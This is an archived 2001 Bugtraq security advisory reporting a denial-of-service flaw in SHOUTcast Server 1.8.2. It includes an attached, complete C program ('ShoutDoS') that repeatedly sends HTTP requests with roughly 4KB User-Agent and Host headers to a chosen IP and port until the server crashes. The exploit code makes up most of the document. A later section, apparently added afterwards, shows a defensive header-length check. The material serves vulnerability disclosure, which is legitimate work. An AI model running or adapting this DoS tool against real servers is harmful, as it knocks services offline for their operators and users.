Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?


Date: Fri, 3 Aug 2001 10:29:20 +0200
From: FraMe <frame@hispalab.com>
To: bugtraq@securityfocus.com
Subject: Denial of Service in SHOUTcast Server 1.8.2 Linux/w32/?


Vendor   :  Nullsoft
Product  :   SHOUTcast Server 1.8.2 Linux/win32/?
Date     :  01/08/2001

CONTENTS

1. Overview
2. Details
3. Systems.
4. Denial of Service
5. Vendor Response

1. Overview:

SHOUTcast Server is a streaming audio server. A "bad" client request can
crash the server.

2. Details

The server crashes after receiving, approximately seven times, a client
HTTP request with a very long buffer (4KB) in the User-Agent and Host
fields.

3. Systems

    - SHOUTcast Server 1.8.2 ( Linux )
    - SHOUTcast Server 1.8.2 ( Win32 )
    - SHOUTcast Server 1.8.2 ( Others ) ( No test )

4. DoS

The DoS in C format is attached.

5. Vendor Response

31/08/01: Sent problem to tom@nullsoft.com

03/08/01: No response from tom@nullsoft.com
                Sent problem to bugtraq@securityfocus.com



[ FraMe - frame@hispalab.com ] [ Digital LiVe - http://frame.lifefromthenet.com ] [ PGP Key - www.hispalab.com/frame/pgpkey.asc ] [ Geek Code - www.hispalab.com/frame/geek.txt ]
Attachment: shoutdos.c

/*
 * ShoutDoS: Remote Denial of Service SHOUTcast Server
 *
 * ShoutDoS (C) 2001 FraMe <frame@hispalab.com>
 *
 * Tested:
 *   SHOUTcast Server 1.8.2 Linux
 *   SHOUTcast Server 1.8.2 Win32
 *
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/errno.h>

void msg(void) {
    printf("ShoutDoS: Remote Denial of Service SHOUTcast Server\n");
    printf("ShoutDoS (C) 2001 FraMe <frame@hispalab.com>\n");
}

int main(int argc,char **argv) {

    int s,n=0,c;
    struct sockaddr_in sa;
    struct hostent *SHOUTserver;

    char buffer[]="GET / HTTP/1.0\r\nUser-Agent: "
        "SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceS"
        "HOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSH"
        "OUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHO"
        "UTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOU"
        "TcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUT"
        "castDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTca"
        "stDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcas"
        "tDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcast"
        "DenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastD"
        "enialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDe"
        "nialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDen"
        "ialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDeni"
        "alofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenia"
        "lofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenial"
        "ofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialo"
        "fServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialofS"
        "erviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSe"
        "rviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSer"
        "viceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServ"
        "iceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServi"
        "ceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServic"
        "eSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofService"
        "SHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceS"
        "HOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSH"
        "OUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHO"
        "UTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOU"
        "TcastDenialofServicSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTc"
        "astDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTca"
        "stDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcas"
        "tDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcast"
        "DenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastD"
        "enialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDe"
        "nialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDen"
        "ialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDeni"
        "alofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenia"
        "lofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenial"
        "ofServiceSHOUTcastDenialofServiceSHOUTcastDenialofServicSHOUTcastDenialof"
        "ServiceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofS"
        "erviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSe"
        "rviceSHOUTcastDenialofServiceSHOUTcastDenialofServiceSHOUTcastDenialofSer"
        "viceSHOUTcastDenialofService"
        "\r\nHost: "
        "your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.no"
        "w.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash."
        "now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cras"
        "h.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cr"
        "ash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go."
        "crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.g"
        "o.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server"
        ".go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serv"
        "er.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.se"
        "rver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your."
        "server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.you"
        "r.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.y"
        "our.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now"
        ".your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.n"
        "ow.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash"
        ".now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cra"
        "sh.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.c"
        "rash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go"
        ".crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server."
        "go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serve"
        "r.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.ser"
        "ver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.s"
        "erver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your"
        ".server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.yo"
        "ur.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now."
        "your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.no"
        "w.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash."
        "now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cras"
        "h.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cr"
        "ash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go."
        "crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.g"
        "o.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.server"
        ".go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.serv"
        "er.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your.se"
        "rver.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.your."
        "server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.you"
        "r.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now.y"
        "our.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.now"
        ".your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash.n"
        "ow.your.server.go.crash.now.your.server.go.crash.now.your.server.go.crash"
        ".now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.cra"
        "sh.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go.c"
        "rash.now.your.server.go.crash.now.your.server.go.crash.now.your.server.go"
        ".crash.now.your.server.go.crash.now.your.server.go.crash.now"
        "\r\nAuthorization: Basic\r\n\r\n";
    char rbuff[512];

    if ( argc != 3 ) {
        msg();
        printf("Usage: %s ip port\n",*argv);
        exit(1);
    }

    if ((SHOUTserver = gethostbyname(argv[1])) == NULL) {
        msg();
        printf("Error: gethostbyname()\n");
        exit(1);
    }

    memcpy(&sa.sin_addr.s_addr,SHOUTserver->h_addr,SHOUTserver->h_length);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(atoi(argv[2]));

    if ((s=socket(PF_INET,SOCK_STREAM,0)) < 0 ) {
        msg();
        printf("Error: socket()\n");
        exit(1);
    }

    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        msg();
        printf("Error: connect()\n");
        exit (1);
    }

    close(s);
    msg();
    printf("Connect. The host appears be up...\n");
    printf("Doing DoS ");

DoS:

    if ((s=socket(PF_INET,SOCK_STREAM,0)) < 0 ) {
        printf(" Error!\n");
        exit(1);
    }

    if (connect(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        printf(" Server Crash!\n");
        exit (1);
    }

    write(s,buffer,sizeof(buffer)-1);
    read(s,rbuff,sizeof(rbuff));
    close(s);
    printf(".");

    goto DoS; // Basic Power :)
}

/* EOF */
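
Added example (not part of the original post and not SHOUTcast code): the advisory does not state the root cause, so this shows one defensive check a server or front-end filter can apply to the kind of request described in section 2, bounding the request head and each header value before any further parsing. The function name check_request_head and the limits MAX_REQUEST_HEAD and MAX_HEADER_VALUE are assumptions chosen for illustration; the check covers every header, not only User-Agent and Host.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits for illustration; the advisory gives no vendor values. */
#define MAX_REQUEST_HEAD 2048   /* request line plus all headers */
#define MAX_HEADER_VALUE 256    /* bytes after the colon in one header */

enum hdr_verdict { HDR_OK, HDR_INCOMPLETE, HDR_MALFORMED,
                   HDR_HEAD_TOO_LARGE, HDR_VALUE_TOO_LONG };

/* Check `len` received bytes; the buffer need not be NUL-terminated. */
enum hdr_verdict check_request_head(const char *req, size_t len)
{
    size_t limit = len < MAX_REQUEST_HEAD ? len : MAX_REQUEST_HEAD;
    size_t pos = 0;
    int is_request_line = 1;

    while (pos < limit) {
        const char *line = req + pos;
        const char *eol = memchr(line, '\n', limit - pos);
        if (eol == NULL)
            break;                          /* line not terminated within limit */
        size_t line_len = (size_t)(eol - line);
        pos += line_len + 1;
        if (line_len > 0 && line[line_len - 1] == '\r')
            line_len--;
        if (line_len == 0)                  /* blank line ends the head */
            return is_request_line ? HDR_MALFORMED : HDR_OK;
        if (is_request_line) { is_request_line = 0; continue; }
        const char *colon = memchr(line, ':', line_len);
        if (colon == NULL)
            return HDR_MALFORMED;
        if (line_len - (size_t)(colon - line) - 1 > MAX_HEADER_VALUE)
            return HDR_VALUE_TOO_LONG;
    }
    /* No blank line seen: either more data is needed or the head is oversized. */
    return len > MAX_REQUEST_HEAD ? HDR_HEAD_TOO_LARGE : HDR_INCOMPLETE;
}

int main(void)
{
    /* Constructed sample request, not taken from the advisory. */
    const char ok[] = "GET / HTTP/1.0\r\nUser-Agent: player/1.0\r\n"
                      "Host: radio.example\r\n\r\n";
    printf("verdict=%d\n", check_request_head(ok, sizeof ok - 1));
    return 0;
}
```

Call it on the bytes accumulated so far after each bounded read, and close the connection on any verdict other than HDR_OK or HDR_INCOMPLETE.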
